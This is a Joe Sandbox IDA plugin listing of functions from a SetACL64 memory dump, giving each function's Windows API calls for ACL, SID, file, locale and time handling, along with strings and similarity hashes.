Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: Frame$BlockEstablisherHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchState
String ID: csm$csm$csm
API String ID: 40297248-393685449
Opcode ID: 01465d0ab2951ccdcd10f37ed96a7a8c97669fa495d3d06220a6bd79f10303bb
Instruction ID: 83146714ccc72cac474846e2029284a51771de65691f10657018b4a06cda29e3
Opcode Fuzzy Hash: 01465d0ab2951ccdcd10f37ed96a7a8c97669fa495d3d06220a6bd79f10303bb
Instruction Fuzzy Hash: E2D1C3B2A18B41CAEB219F65D4452AD37A0FF45B88F001139EF4D97B85CF39E880C712

Function 00007FF68683C7D0 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 291timeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF68683C826
FileTimeToSystemTime.KERNEL32 ref: 00007FF68683C84A
SystemTimeToTzSpecificLocalTime.KERNEL32 ref: 00007FF68683C85B
FileTimeToLocalFileTime.KERNEL32 ref: 00007FF68683C86B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68683CB04

Strings

%04d-%02d-%02d %02d:%02d:%02d.%03d %s%02d%02d, xrefs: 00007FF68683C8EC
-, xrefs: 00007FF68683C8BD

Memory Dump Source

Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: Time$File$System$Local$Specific_invalid_parameter_noinfo_noreturn
String ID: %04d-%02d-%02d %02d:%02d:%02d.%03d %s%02d%02d$-
API String ID: 1697026759-531884627
Opcode ID: c8f77f1d47166479bcfb340e38561e243565818e0dfa4d9be323b608fca60165
Instruction ID: 58278bfdf5c43c6d90a3c635f062df40a94726280256f7dbfa058458c7548064
Opcode Fuzzy Hash: c8f77f1d47166479bcfb340e38561e243565818e0dfa4d9be323b608fca60165
Instruction Fuzzy Hash: CDD14CB2618B81C6DB10DF15F4802AEB7A5FB88B84F50412AEB8D87B68DF7DD545CB10

Function 00007FF6868606C0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 146COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6868608C0: IsValidSid.ADVAPI32(?,?,?,00007FF68686034D,?,?,?,?,?,00007FF68685F8CF), ref: 00007FF6868608E2
Part of subcall function 00007FF6868608C0: GetLengthSid.ADVAPI32(?,?,?,00007FF68686034D,?,?,?,?,?,00007FF68685F8CF), ref: 00007FF6868608F3

IsValidSid.ADVAPI32(?,?,?,?,?,?,00007FF686860516,?,?,?,?,?,00007FF68685F8CF), ref: 00007FF686860789
IsValidSid.ADVAPI32(?,?,?,?,?,?,00007FF686860516,?,?,?,?,?,00007FF68685F8CF), ref: 00007FF68686079C
EqualSid.ADVAPI32(?,?,?,?,?,?,00007FF686860516,?,?,?,?,?,00007FF68685F8CF), ref: 00007FF6868607AE

Strings

invalid hash bucket count, xrefs: 00007FF6868608AD

Memory Dump Source

Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: Valid$EqualLength
String ID: invalid hash bucket count
API String ID: 2688289545-1101463472
Opcode ID: 215e4837fbac5d1038da7360346adbacd6a27b358d3f20a4aea1ad4a7b7f4b8a
Instruction ID: aec1bc7d455feaea8ee9fb5441f5cd35bd87277d0a54f69524fcdfe86b81e461
Opcode Fuzzy Hash: 215e4837fbac5d1038da7360346adbacd6a27b358d3f20a4aea1ad4a7b7f4b8a
Instruction Fuzzy Hash: AB51F6B6615B85C6DB54CF12EA4412973A8FF48BD4F04843ADB9D83BA5DF39E860C360

Function 00007FF68683A980 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 82COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00007FF68683A996
std::_Lockit::_Lockit.LIBCPMT ref: 00007FF68683A9BB
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF68683A9E5

Part of subcall function 00007FF68683A7F0: std::_Lockit::_Lockit.LIBCPMT ref: 00007FF68683A859
Part of subcall function 00007FF68683A7F0: std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00007FF68683A8A4
Part of subcall function 00007FF68683A7F0: _Getctype.LIBCPMT ref: 00007FF68683A8BC
Part of subcall function 00007FF68683A7F0: std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF68683A94C

std::_Facet_Register.LIBCPMT ref: 00007FF68683AA54
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF68683AA6E
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF68683AA83

Strings

asio.system, xrefs: 00007FF68683AA90

Memory Dump Source

Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_GetctypeLocinfo::_Locinfo_ctorRegister
String ID: asio.system
API String ID: 2324539378-4188385678
Opcode ID: b713dadba4159cd6b2885aab081a9f7acc6a6da892865188596ee75eb23cfb0b
Instruction ID: 2aa9f56c5519146b10ebf07bcfcdd41a668224ce0b281bbade2766c8b8e44cb0
Opcode Fuzzy Hash: b713dadba4159cd6b2885aab081a9f7acc6a6da892865188596ee75eb23cfb0b
Instruction Fuzzy Hash: 29318FA2A0CA42C5EA05DB59EA801B96360FF85B94F080139DB4D977E5DE6EEC51C320

Function 00007FF68682C870 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 81COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00007FF68682C886
std::_Lockit::_Lockit.LIBCPMT ref: 00007FF68682C8AB
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF68682C8D5
std::_Facet_Register.LIBCPMT ref: 00007FF68682C944
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF68682C95E
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF68682C973

Strings

\\?\UNC\, xrefs: 00007FF68682C877

Memory Dump Source

Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID: \\?\UNC\
API String ID: 2081738530-3025105874
Opcode ID: e61a02660369b208d4869bf3317d8eeecda6ec06fbff3dc1bbd376d3e95adc6e
Instruction ID: cb7c375bac609c8eeabf6a0a5e942b8854c30d47ad0816f5082964d97e39d29b
Opcode Fuzzy Hash: e61a02660369b208d4869bf3317d8eeecda6ec06fbff3dc1bbd376d3e95adc6e
Instruction Fuzzy Hash: 4E31DEA1A48A42C1EA01DB66E4402B9A360FF89B94F084139DB8D837E5DF7EEC11C320

Function 00007FF686859D50 Relevance: 12.2, APIs: 8, Instructions: 171COMMON

Download Yara Rule

APIs

GetAclInformation.ADVAPI32 ref: 00007FF686859DE8
GetLastError.KERNEL32 ref: 00007FF686859DF2
GetAce.ADVAPI32 ref: 00007FF686859E29
IsValidSid.ADVAPI32 ref: 00007FF686859E44
DeleteAce.ADVAPI32 ref: 00007FF686859EA3
GetLastError.KERNEL32 ref: 00007FF686859ED1
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF686859F98
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF686859F9E

Memory Dump Source

Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: ErrorLast_invalid_parameter_noinfo_noreturn$DeleteInformationValid
String ID:
API String ID: 2376240148-0
Opcode ID: c39aa1aca0cd00dc7d4238e9c45bf37263b6fe557bd30a66a51f3a55d98a4b0b
Instruction ID: d6778ddde4d9b8e200e60b114b42d5825b5e084ff569168b2580374e082012ef
Opcode Fuzzy Hash: c39aa1aca0cd00dc7d4238e9c45bf37263b6fe557bd30a66a51f3a55d98a4b0b
Instruction Fuzzy Hash: C96180B2B19682C9FF10CF65E4983AD23A5FF44788F400539DA4E97A94CE79E801C324

Function 00007FF686881F54 Relevance: 10.8, APIs: 7, Instructions: 291COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF68688238A

Memory Dump Source

Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 3902d700e4e9c02f7b197dc7376ff7fc9a32c522704f9573ed0591f326e22e7f
Instruction ID: 184ca745b0382b4444eff3d6e69f0dc85c95136decf61ffc826901ef96354cfe
Opcode Fuzzy Hash: 3902d700e4e9c02f7b197dc7376ff7fc9a32c522704f9573ed0591f326e22e7f
Instruction Fuzzy Hash: BDC136A2A1C787C2EB609B1594252BDA791FF81B81F444139DA8E877B1CF3EEC55C360

Function 00007FF68685C766 Relevance: 10.7, APIs: 7, Instructions: 213fileCOMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68685C895
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68685C89B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68685C8A1
CreateFileW.KERNEL32 ref: 00007FF68685C913
GetLastError.KERNEL32 ref: 00007FF68685C922
CreateFileW.KERNEL32 ref: 00007FF68685CA06

Memory Dump Source

Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$CreateFile$ErrorLast
String ID:
API String ID: 2384231905-0
Opcode ID: 0eb886a8d4768f19568f5e6099b32da699c40024d309cc6945aa3d39ec1d6415
Instruction ID: f7628ec9d9e294fb19bf9303db138274345bb7d7a282b4d15a6f13d8164fcce6
Opcode Fuzzy Hash: 0eb886a8d4768f19568f5e6099b32da699c40024d309cc6945aa3d39ec1d6415
Instruction Fuzzy Hash: C7816EA2B18642C1EA109B25E45936D6252BF84BE8F40423DDB5E877E9DF3EDC84C760

Function 00007FF68685C6A3 Relevance: 10.7, APIs: 7, Instructions: 181fileCOMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68685C89B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68685C8A1
CreateFileW.KERNEL32 ref: 00007FF68685C913
GetLastError.KERNEL32 ref: 00007FF68685C922
CreateFileW.KERNEL32 ref: 00007FF68685CA06

Memory Dump Source

Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: CreateFile_invalid_parameter_noinfo_noreturn$ErrorLast
String ID:
API String ID: 4071529928-0
Opcode ID: 86a63f8ac1b34f836c6370ff0e3d0cf0e1df9ed1dc5296b969972eb07ba71060
Instruction ID: 1e75416a831b81700c47d7d9835695fc26712fea72a0e96a5c1e4934af8c14ce
Opcode Fuzzy Hash: 86a63f8ac1b34f836c6370ff0e3d0cf0e1df9ed1dc5296b969972eb07ba71060
Instruction Fuzzy Hash: 1C51A0B2A08642C5EB10DB25E45937D22A2BF84BD8F50423DDB5E876A9DF3EDC80C750

Function 00007FF686833670 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 130COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00007FF6868336D9
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00007FF686833724
_Getctype.LIBCPMT ref: 00007FF68683373C
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF6868337F4

Strings

bad locale name, xrefs: 00007FF686833817
boost::too_few_args: format-string referred to more arguments than were passed, xrefs: 00007FF686833830

Memory Dump Source

Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: std::_$Lockit$GetctypeLocinfo::_Locinfo_ctorLockit::_Lockit::~_
String ID: bad locale name$boost::too_few_args: format-string referred to more arguments than were passed
API String ID: 2967684691-1915342359
Opcode ID: 6fce13af95b5f6627bf353f9880eae4aab78e0fa0b6ce40869ca327f0ee4b133
Instruction ID: 68a54a09471adddd15e6c2dfedc425aae237b2083b18e025860b236e28e49fae
Opcode Fuzzy Hash: 6fce13af95b5f6627bf353f9880eae4aab78e0fa0b6ce40869ca327f0ee4b133
Instruction Fuzzy Hash: 1A5169A2B19B81CAEB10DBB4D5402AC33B4BF94748F044139DF4DA7A56DF39A866D314

Function 00007FF686857576 Relevance: 10.6, APIs: 7, Instructions: 119COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF686858006

Memory Dump Source

Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3668304517-0
Opcode ID: c51a83a8394eca94e03b9f44e2b4faae1dc388095b0f2f85e928d261f870c053
Instruction ID: 4048634167feb9d050436bfb3bbc3c304df29b2bda0a5d71aa432abf5d5043ae
Opcode Fuzzy Hash: c51a83a8394eca94e03b9f44e2b4faae1dc388095b0f2f85e928d261f870c053
Instruction Fuzzy Hash: 964196E2A25742C5EF049B28D45D7BD2251FF447A8F408239EB6D466D6DF7EE880C324

Function 00007FF6868682D8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,?,?,00007FF68686858A,?,?,?,00007FF686868284,?,?,?,?,00007FF686865001), ref: 00007FF68686835D
GetLastError.KERNEL32(?,?,?,00007FF68686858A,?,?,?,00007FF686868284,?,?,?,?,00007FF686865001), ref: 00007FF68686836B
LoadLibraryExW.KERNEL32(?,?,?,00007FF68686858A,?,?,?,00007FF686868284,?,?,?,?,00007FF686865001), ref: 00007FF686868395
FreeLibrary.KERNEL32(?,?,?,00007FF68686858A,?,?,?,00007FF686868284,?,?,?,?,00007FF686865001), ref: 00007FF6868683DB
GetProcAddress.KERNEL32(?,?,?,00007FF68686858A,?,?,?,00007FF686868284,?,?,?,?,00007FF686865001), ref: 00007FF6868683E7

Strings

api-ms-, xrefs: 00007FF68686837D

Memory Dump Source

Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: 13dd072e1bb41a21cd92e4e58addc349d8cc729cde5a11a5225393acf1a03f06
Instruction ID: 9dae356843e33ace5e1bb9263707ea7b4e54aef8c19b499b55719123250e6134
Opcode Fuzzy Hash: 13dd072e1bb41a21cd92e4e58addc349d8cc729cde5a11a5225393acf1a03f06
Instruction Fuzzy Hash: CE31E5A1B2A646C5FE219B02A84457A2395FF48B60F190539DE1D8B391EF3EE804C330

Function 00007FF686882DD4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 00007FF686882E05
GetLastError.KERNEL32 ref: 00007FF686882E11
CloseHandle.KERNEL32 ref: 00007FF686882E29
CreateFileW.KERNEL32 ref: 00007FF686882E54
WriteConsoleW.KERNEL32 ref: 00007FF686882E73

Strings

CONOUT$, xrefs: 00007FF686882E35

Memory Dump Source

Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: 600edac47a027b3d7eb0109fe524e7f64bf11a566be2c18d05efb9c518b43446
Instruction ID: 572d539de747e5d9e14f76fa5a9723b6c5e6272019e4a120bca678b000d1cbc0
Opcode Fuzzy Hash: 600edac47a027b3d7eb0109fe524e7f64bf11a566be2c18d05efb9c518b43446
Instruction Fuzzy Hash: 5B11AFA1B58A41C6E3508B12A85572972A0FF88BE5F040238EA5EC77A5CF3DD800C754

Function 00007FF686861A24 Relevance: 9.2, APIs: 6, Instructions: 203COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32 ref: 00007FF686861A97
MultiByteToWideChar.KERNEL32 ref: 00007FF686861B3E
LCMapStringEx.KERNEL32 ref: 00007FF686861B79
LCMapStringEx.KERNEL32 ref: 00007FF686861BD2
LCMapStringEx.KERNEL32 ref: 00007FF686861C7F
WideCharToMultiByte.KERNEL32 ref: 00007FF686861CC1

Memory Dump Source

Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: ByteCharMultiStringWide
String ID:
API String ID: 2829165498-0
Opcode ID: 7f76452235485e82c6a2b8be4f7a02939a3fff3751e97289b820c814a5331ee2
Instruction ID: 53e15f41ae5e384b99c6c492f131ab6235d0723ecabc689a927ce2c52c9d1bc2
Opcode Fuzzy Hash: 7f76452235485e82c6a2b8be4f7a02939a3fff3751e97289b820c814a5331ee2
Instruction Fuzzy Hash: D581B2B2A28782C6EB208F55944437E66A1FF44BA4F044238EB9E97BD5DF3DE805C710

Function 00007FF686853B20 Relevance: 9.2, APIs: 6, Instructions: 168COMMON

Download Yara Rule

APIs

GetAclInformation.ADVAPI32(?,?,?,?,?,?,00000000,00000000,00000000,00001000,?,00007FF68684F5AD), ref: 00007FF686853B8B
GetAclInformation.ADVAPI32(?,?,?,?,?,?,00000000,00000000,00000000,00001000,?,00007FF68684F5AD), ref: 00007FF686853BAF

Memory Dump Source

Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: Information
String ID:
API String ID: 2951059284-0
Opcode ID: 5a35f54198f71293160f6a52ccbbda1ccbfc04340909618ab7250ec950f78163
Instruction ID: 9a3bf9d495c13862ded4c427606a9a1e4bfd08474d82bddae32a2f31bbb405d9
Opcode Fuzzy Hash: 5a35f54198f71293160f6a52ccbbda1ccbfc04340909618ab7250ec950f78163
Instruction Fuzzy Hash: BC617FA2A0C696C6EB60CB11D45877A67A1FF85B84F144039DE8F87695EF3EEC41C720

Function 00007FF6868390D0 Relevance: 9.1, APIs: 6, Instructions: 99COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00007FF6868390E6
std::_Lockit::_Lockit.LIBCPMT ref: 00007FF68683910B
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF686839135

Part of subcall function 00007FF686838F40: std::_Lockit::_Lockit.LIBCPMT ref: 00007FF686838FAE
Part of subcall function 00007FF686838F40: std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00007FF686838FF6
Part of subcall function 00007FF686838F40: std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF68683909D

std::_Facet_Register.LIBCPMT ref: 00007FF6868391A4
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF6868391BE
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6868391D3

Memory Dump Source

Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Locinfo::_Locinfo_ctorRegister
String ID:
API String ID: 3702003507-0
Opcode ID: 626367f9b8e3e811170a77d3899fc771f4540901281f47c30c090418adc7da96
Instruction ID: 3ac34f992c6dfb38d9f798c207228385878a08602af3722787174c18f00ef7a0
Opcode Fuzzy Hash: 626367f9b8e3e811170a77d3899fc771f4540901281f47c30c090418adc7da96
Instruction Fuzzy Hash: 2841C1B1A08A41C1EF059B65E5041BC6365FF45BA4F080239DA9D977D6EF7EEC41C320

